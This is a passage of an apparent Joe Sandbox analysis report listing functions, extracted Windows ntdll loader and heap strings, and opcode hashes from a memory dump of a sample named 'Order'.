                                                                • minkernel\ntdll\ldrinit.c, xrefs: 01A19A11, 01A19A3A
                                                                • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 01A199ED
                                                                • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01A19A01
                                                                • LdrpInitShimEngine, xrefs: 01A199F4, 01A19A07, 01A19A30
                                                                • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01A19A2A
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                • API String ID: 0-204845295
                                                                • Opcode ID: f63dbbb22f69c349f0dd5ba25be87d14153568cedadcc202ec7e0ad25f1f44fa
                                                                • Instruction ID: 284ab111577d2438ff7247b369dc17e5b155d5a8597ccb9b4894d1233f238b93
                                                                • Opcode Fuzzy Hash: f63dbbb22f69c349f0dd5ba25be87d14153568cedadcc202ec7e0ad25f1f44fa
                                                                • Instruction Fuzzy Hash: 3051D0726083049FE720DF24D991FAB77E8FFC4648F44091DF689971A5D630E949CB92
                                                                Function 019FC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • Unable to build import redirection Table, Status = 0x%x, xrefs: 01A381E5
                                                                • minkernel\ntdll\ldrinit.c, xrefs: 019FC6C3
                                                                • LdrpInitializeImportRedirection, xrefs: 01A38177, 01A381EB
                                                                • LdrpInitializeProcess, xrefs: 019FC6C4
                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 01A38181, 01A381F5
                                                                • Loading import redirection DLL: '%wZ', xrefs: 01A38170
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                • API String ID: 0-475462383
                                                                • Opcode ID: 5d313f492ea56606982e0f94b0d615554bd0f39f8979cef6944f718134c443c2
                                                                • Instruction ID: 83acdef09fc5046844493527902c1fb025169db64a696715f35bf2a6f23b2b6a
                                                                • Opcode Fuzzy Hash: 5d313f492ea56606982e0f94b0d615554bd0f39f8979cef6944f718134c443c2
                                                                • Instruction Fuzzy Hash: A7310771748346AFC224EF68DD46E2AB7D4FFD4B10F04051CF9886B291D620ED05C7A2
                                                                Function 019F2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 01A3219F
                                                                • RtlGetAssemblyStorageRoot, xrefs: 01A32160, 01A3219A, 01A321BA
                                                                • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01A32178
                                                                • SXS: %s() passed the empty activation context, xrefs: 01A32165
                                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 01A321BF
                                                                • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01A32180
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                • API String ID: 0-861424205
                                                                • Opcode ID: 57f9e2368cf5f72ecec46df63d4cde83588a3a8b78151282f6406af84baef4e4
                                                                • Instruction ID: 7537a82a8e131cad78672f7e74f2294a54b8d3dd5dd4ed9adf742d8944018fbc
                                                                • Opcode Fuzzy Hash: 57f9e2368cf5f72ecec46df63d4cde83588a3a8b78151282f6406af84baef4e4
                                                                • Instruction Fuzzy Hash: FA31C436B413257BE7219B9A8D82F6A7A78DBE5A50F05405EFB08A7240D270EE00C7E1
                                                                Function 01A0096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 01A02DF0: LdrInitializeThunk.NTDLL ref: 01A02DFA
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A00BA3
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A00BB6
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A00D60
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A00D74
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                • String ID:
                                                                • API String ID: 1404860816-0
                                                                • Opcode ID: 610695840dfd13e3c01f076459ff11508a2563a38d24598d81baa8dc13328128
                                                                • Instruction ID: db3a4559c10a9ebeebf455f9517d55dfa66de6f5dc11ee3e399df6094bbeb9c4
                                                                • Opcode Fuzzy Hash: 610695840dfd13e3c01f076459ff11508a2563a38d24598d81baa8dc13328128
                                                                • Instruction Fuzzy Hash: 12427D71900705DFDB62CF28C980BAAB7F4FF44314F1445AAE989EB281D770AA85CF61
                                                                Function 019CA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                • API String ID: 0-379654539
                                                                • Opcode ID: 5f4213737beb19907425def169131bb7d07df1b3f4e7ddd5446f0d5ea3aa1552
                                                                • Instruction ID: 20205a103b5c0069b51e32b7d90af523722215402ddd40cfba7d4d7a59dd23dd
                                                                • Opcode Fuzzy Hash: 5f4213737beb19907425def169131bb7d07df1b3f4e7ddd5446f0d5ea3aa1552
                                                                • Instruction Fuzzy Hash: FDC17B7420838A8FD711CF58C544B6AB7E4BF94B04F04896EF9DA8B291E734CA49CB57
                                                                Function 019F8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 019F855E
                                                                • LdrpInitializeProcess, xrefs: 019F8422
                                                                • minkernel\ntdll\ldrinit.c, xrefs: 019F8421
                                                                • @, xrefs: 019F8591
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                • API String ID: 0-1918872054
                                                                • Opcode ID: dec65d88095baff68f5be4cc909d8bf04d51ac8c60f230b22ee782849beb534d
                                                                • Instruction ID: ed92cff31b89cc0467932bd0e709511f1b17b014bf5ab90d5ab15856e4038679
                                                                • Opcode Fuzzy Hash: dec65d88095baff68f5be4cc909d8bf04d51ac8c60f230b22ee782849beb534d
                                                                • Instruction Fuzzy Hash: 6D917C71548345BFEB22EF65CD44FABBAECBF84754F40092EFA8892151E334D9048B62
                                                                Function 019F273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • .Local, xrefs: 019F28D8
                                                                • SXS: %s() passed the empty activation context, xrefs: 01A321DE
                                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 01A322B6
                                                                • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 01A321D9, 01A322B1
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                • API String ID: 0-1239276146
                                                                • Opcode ID: 6a2ff2937e57994fe0f14c036f7dd6680aafe0f103af1adf73106dcf7be79061
                                                                • Instruction ID: 0a835d62205f6330645d97c81e1b311a562a0da3d1edc5d4c81fd69bfd3093cb
                                                                • Opcode Fuzzy Hash: 6a2ff2937e57994fe0f14c036f7dd6680aafe0f103af1adf73106dcf7be79061
                                                                • Instruction Fuzzy Hash: DCA19031901229ABDB24CF98CD84BA9B7B4BF58314F2441EAEA08A7251D730DEC0CF90
                                                                Function 019F4AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01A33437
                                                                • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01A33456
                                                                • RtlDeactivateActivationContext, xrefs: 01A33425, 01A33432, 01A33451
                                                                • SXS: %s() called with invalid flags 0x%08lx, xrefs: 01A3342A
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                • API String ID: 0-1245972979
                                                                • Opcode ID: bfa44b4a4e880013c32fcfad92217210373a14ac9cdbf4abf34cd02e4cf61508
                                                                • Instruction ID: 243f131d549013cc928f6d38c37f8bbb8b56fba587fe89f5fcedb9d55659ea35
                                                                • Opcode Fuzzy Hash: bfa44b4a4e880013c32fcfad92217210373a14ac9cdbf4abf34cd02e4cf61508
                                                                • Instruction Fuzzy Hash: DE610336614712ABDB22CF1DC841B2AB7E5BFC0B62F15851DFA599B242D730E801CBD1
                                                                Function 019C64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01A21028
                                                                • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 01A210AE
                                                                • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01A20FE5
                                                                • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 01A2106B
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                • API String ID: 0-1468400865
                                                                • Opcode ID: cb698fd463fb65de3ba605b3aa83a0a811e770ad98a33caf913854a49f8699c2
                                                                • Instruction ID: cf49ea2d26edbecb69802858c6491c824447e7d6ddf633d60824269772b05e78
                                                                • Opcode Fuzzy Hash: cb698fd463fb65de3ba605b3aa83a0a811e770ad98a33caf913854a49f8699c2
                                                                • Instruction Fuzzy Hash: BA71B1719043459FCB21DF18C984F977FA8AFA4B64F50046CF9888B286D734D589CBD2
                                                                Function 019E245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 01A2A992
                                                                • LdrpDynamicShimModule, xrefs: 01A2A998
                                                                • apphelp.dll, xrefs: 019E2462
                                                                • minkernel\ntdll\ldrinit.c, xrefs: 01A2A9A2
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                • API String ID: 0-176724104
                                                                • Opcode ID: 4a64d344f78d25da48886b3695f275dc725f06ffeede359f17abadda08537335
                                                                • Instruction ID: 29b56b4b114a4cf3a382bacf34119c5c1c4795421b293cfef1463fe9301a6483
                                                                • Opcode Fuzzy Hash: 4a64d344f78d25da48886b3695f275dc725f06ffeede359f17abadda08537335
                                                                • Instruction Fuzzy Hash: F0316D7AB00251ABDB32DF9ED8C5E6A77B9FFC4B00F150419F905A7256D7706982C780
                                                                Function 019D29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • HEAP: , xrefs: 019D3264
                                                                • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 019D327D
                                                                • HEAP[%wZ]: , xrefs: 019D3255
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                • API String ID: 0-617086771
                                                                • Opcode ID: e39f23a793178a41de65abd7177f57e9e7eded70c7dddb97ff36674a23235664
                                                                • Instruction ID: 494d24020a688c57a50c2ca3789ae33d2691f9e4d6e9f1da675266b7669fc67e
                                                                • Opcode Fuzzy Hash: e39f23a793178a41de65abd7177f57e9e7eded70c7dddb97ff36674a23235664
                                                                • Instruction Fuzzy Hash: 2492CC71A042499FDB25CF68C440BAEBBF5FF48301F18C499E959AB392D734AA41CF51
                                                                Function 019D0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                • API String ID: 0-4253913091
                                                                • Opcode ID: 960fd715935bfb38d5aacd6b55f706996eb0c419d2b4b622204f0850904ac7e1
                                                                • Instruction ID: fb8f169dad767b8a0cb5bd7f53441ebcc2ca7a25fad8f703e26dd47d4a553ee4
                                                                • Opcode Fuzzy Hash: 960fd715935bfb38d5aacd6b55f706996eb0c419d2b4b622204f0850904ac7e1
                                                                • Instruction Fuzzy Hash: 10F1BC70A00606DFEB25DF6CC984FAAB7B5FF45304F188168E51A9B392D734E981CB91
                                                                Function 019E6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $@
                                                                • API String ID: 0-1077428164
                                                                • Opcode ID: 607451c12ca255099924a64f608d7bdaa4c2ef0bfe2fd90cd56cfe517ebd9023
                                                                • Instruction ID: 3e4fbe2807b6f57ae43b1f67b5670114958cba57961209e31c1bbb68e7b301df
                                                                • Opcode Fuzzy Hash: 607451c12ca255099924a64f608d7bdaa4c2ef0bfe2fd90cd56cfe517ebd9023
                                                                • Instruction Fuzzy Hash: D2C280716083519FDB2ACF68C884BABBBE5AF88754F04892DE98DC7241D734D845CB93
                                                                Function 019BA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: FilterFullPath$UseFilter$\??\
                                                                • API String ID: 0-2779062949
                                                                • Opcode ID: ec5831c4e9d3e9201571ba2db397ffc9d80fb866b7c68be1a29d14f129df288e
                                                                • Instruction ID: ccb605129c3fb1139c2ac65e5f7fafcf51a8ece649d3018d162563b04aaa1a8c
                                                                • Opcode Fuzzy Hash: ec5831c4e9d3e9201571ba2db397ffc9d80fb866b7c68be1a29d14f129df288e
                                                                • Instruction Fuzzy Hash: 74A17B759516299BDB31EF68CC88BEAB7B8EF48710F0001EAE90CA7254D7359E84CF50
                                                                Function 019E0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • minkernel\ntdll\ldrinit.c, xrefs: 01A2A121
                                                                • Failed to allocated memory for shimmed module list, xrefs: 01A2A10F
                                                                • LdrpCheckModule, xrefs: 01A2A117
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                • API String ID: 0-161242083
                                                                • Opcode ID: d3a6c31f93532b93ed95ee91b00efe0fccbac90e482d9eec9fa103acbacc89e3
                                                                • Instruction ID: 77ae6dc4c3ef1a4ae0aab7802fc19d2a2947c0aa5ab6a03d9c714508ddcc045f
                                                                • Opcode Fuzzy Hash: d3a6c31f93532b93ed95ee91b00efe0fccbac90e482d9eec9fa103acbacc89e3
                                                                • Instruction Fuzzy Hash: 1671C074E00205DFDB26DFACC984AAEB7F5FB88704F18442DE90AE7652D774A942CB50
                                                                Function 019D0A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                • API String ID: 0-1334570610
                                                                • Opcode ID: 1fab86c11b3230a7bd94d38cdbf350e5649ef8e191bca7fb3234051befbae92b
                                                                • Instruction ID: 331df2ae0b90d322f2efa599a06d31ac53f8f64a1381f4df0d473566c6c89de1
                                                                • Opcode Fuzzy Hash: 1fab86c11b3230a7bd94d38cdbf350e5649ef8e191bca7fb3234051befbae92b
                                                                • Instruction Fuzzy Hash: 4E61C030A04301DFEB29CF28C584BAABBE5FF45704F18C559E4998F292D774E881CB91
                                                                Function 019FC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • minkernel\ntdll\ldrinit.c, xrefs: 01A382E8
                                                                • Failed to reallocate the system dirs string !, xrefs: 01A382D7
                                                                • LdrpInitializePerUserWindowsDirectory, xrefs: 01A382DE
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                • API String ID: 0-1783798831
                                                                • Opcode ID: f0232c1cbb49dd5b08f719108fdffec12f2aa318ccc8e9649c22e9be7ec5a32a
                                                                • Instruction ID: d5e7bc19a5e2b5aa574ac5ae834d7c86faeaab756ec2484395c7620625874312
                                                                • Opcode Fuzzy Hash: f0232c1cbb49dd5b08f719108fdffec12f2aa318ccc8e9649c22e9be7ec5a32a
                                                                • Instruction Fuzzy Hash: F641E1B5504345ABDB21EB68D984F5B77E8EF84750F00892EFA4CD32A2E774D8018B91
                                                                Function 01A7C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • @, xrefs: 01A7C1F1
                                                                • PreferredUILanguages, xrefs: 01A7C212
                                                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 01A7C1C5
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                • API String ID: 0-2968386058
                                                                • Opcode ID: 440693d7e4a89c2c0a18f4d0e964d1b3f3a0b619976bbe872bb0d4cde2e599c4
                                                                • Instruction ID: 04a9232a5dae39f91e90024bad4b63b9daeab7059fc7bbf579b96edf21437f5b
                                                                • Opcode Fuzzy Hash: 440693d7e4a89c2c0a18f4d0e964d1b3f3a0b619976bbe872bb0d4cde2e599c4
                                                                • Instruction Fuzzy Hash: D1416471D0020AEBDB11EFD8CC55BEEB7B8AB54714F14406AE609F7284E7749B448B90
                                                                Function 01A54144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                • API String ID: 0-1373925480
                                                                • Opcode ID: 56299fcb6c11285557ce84c705ed0ed9ff180a0aee89dd1648e42d7fdaa5fec2
                                                                • Instruction ID: 3215c5e31ab71d4e047b34308684a7aeeea44dbe4b9e62985fc7d9a6095883c9
                                                                • Opcode Fuzzy Hash: 56299fcb6c11285557ce84c705ed0ed9ff180a0aee89dd1648e42d7fdaa5fec2
                                                                • Instruction Fuzzy Hash: 08414771A087588BEB26DBD9C944BADBBF4FF99380F14005ADD05EB381E7348981CB51
                                                                Function 01A44755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01A44888
                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 01A44899
                                                                • LdrpCheckRedirection, xrefs: 01A4488F
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                • API String ID: 0-3154609507
                                                                • Opcode ID: 0bddbd1c7723b96c58115eb10722aed6aa17eea0feaecc59fdc784326be7f911
                                                                • Instruction ID: 3a17d177ecc2c47ded605573a816b5f0ff13dba7896eeb0aafde3e0fba5187b3
                                                                • Opcode Fuzzy Hash: 0bddbd1c7723b96c58115eb10722aed6aa17eea0feaecc59fdc784326be7f911
                                                                • Instruction Fuzzy Hash: 8841AF72A047919BEB22CF6CD941B667BE4AFCDA50F190569ED48A7212E730D801CB91
                                                                Function 019D0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                • API String ID: 0-2558761708
                                                                • Opcode ID: 0f0cad0682398b2912e813f8b1fba49fe4ed93b463cfa47e7c75d9576d002bf9
                                                                • Instruction ID: 9b0a22c22bdd872f6502125ae9f1799be72eb3827a8179c4d81eb5a87ab3a0b0
                                                                • Opcode Fuzzy Hash: 0f0cad0682398b2912e813f8b1fba49fe4ed93b463cfa47e7c75d9576d002bf9
                                                                • Instruction Fuzzy Hash: 6E11DF317181529FEB29CA1DC884FBAF7A6FF8062AF188159F40ACB292DB34D841C750
                                                                Function 01A420DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • minkernel\ntdll\ldrinit.c, xrefs: 01A42104
                                                                • Process initialization failed with status 0x%08lx, xrefs: 01A420F3
                                                                • LdrpInitializationFailure, xrefs: 01A420FA
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                • API String ID: 0-2986994758
                                                                • Opcode ID: 71e7cbd1dd22e9de96be903969ce0020fb7365d40ecfa3dc58f7f43e9c8d474d
                                                                • Instruction ID: a8e21f2f927a2a47cf0d54a5acc25356e3e96c28f612aa2f6f79c6824ae2fc00
                                                                • Opcode Fuzzy Hash: 71e7cbd1dd22e9de96be903969ce0020fb7365d40ecfa3dc58f7f43e9c8d474d
                                                                • Instruction Fuzzy Hash: FDF0FC356403487BEB24D74CDD46F957768FBC4B54F500069F70477281D1F0A945C691
                                                                Function 019D03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID: ___swprintf_l
                                                                • String ID: #%u
                                                                • API String ID: 48624451-232158463
                                                                • Opcode ID: ba6036c53deec1976a2ec9d9c093c22c341685c8361b276c2f0998a83628f71b
                                                                • Instruction ID: 6b5bb7cc6cb0ce8b02857efdfd93bfb713d3cbe4dfd6ee56169221ba1413cd87
                                                                • Opcode Fuzzy Hash: ba6036c53deec1976a2ec9d9c093c22c341685c8361b276c2f0998a83628f71b
